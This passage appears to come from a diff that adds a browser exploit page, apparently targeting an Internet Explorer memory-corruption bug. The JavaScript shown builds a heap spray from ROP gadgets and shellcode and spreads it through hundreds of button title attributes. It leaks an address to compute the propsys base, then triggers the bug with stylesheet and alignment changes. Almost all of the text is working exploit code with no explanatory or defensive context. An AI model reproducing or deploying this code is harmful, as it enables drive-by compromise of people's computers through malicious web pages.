unescape("%u0e0e%u0e0e"); + var offset_to_stack_shift = 0x6f7; + var offset_to_xchg = 0xd2+2; + // Jumping a bit around here, pretty sure this can be simplified but hey... it works + data = junk.substring(0,fix1-rop.length) + rop + fixop + shellcode + junk.substring(0,offset_to_stack_shift-fix1-fixop.length-shellcode.length) + stack_shift_rop + junk.substring(0,offset_to_xchg-stack_shift_rop.length) + xchg; + data += junk.substring(0,0x800-offset_to_stack_shift-offset_to_xchg-xchg.length); + + while (data.length < 0x80000) data += data; + for (var i = 0; i < 0x350; i++) + { + var obj = document.createElement("button"); + obj.title = data.substring(0,(0x7fb00-2)/2); + hso.appendChild(obj); + } + } + + function boom() { + document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; + th1.align = "right"; + } + + setTimeout(function() { + + var txt = document.getElementById("textarea"); + var il = txt.value.substring(0,2); + var leaked_addr = readu(il); + base_leaked_addr = leaked_addr - 0xbacc; // base of propsys + base_leaked_addr = base_leaked_addr.toString(16); + spray(); + boom(); + + }, 1000); // can be reduced + + + + + + + + +
    1
    + + + +
    + + \ No newline at end of file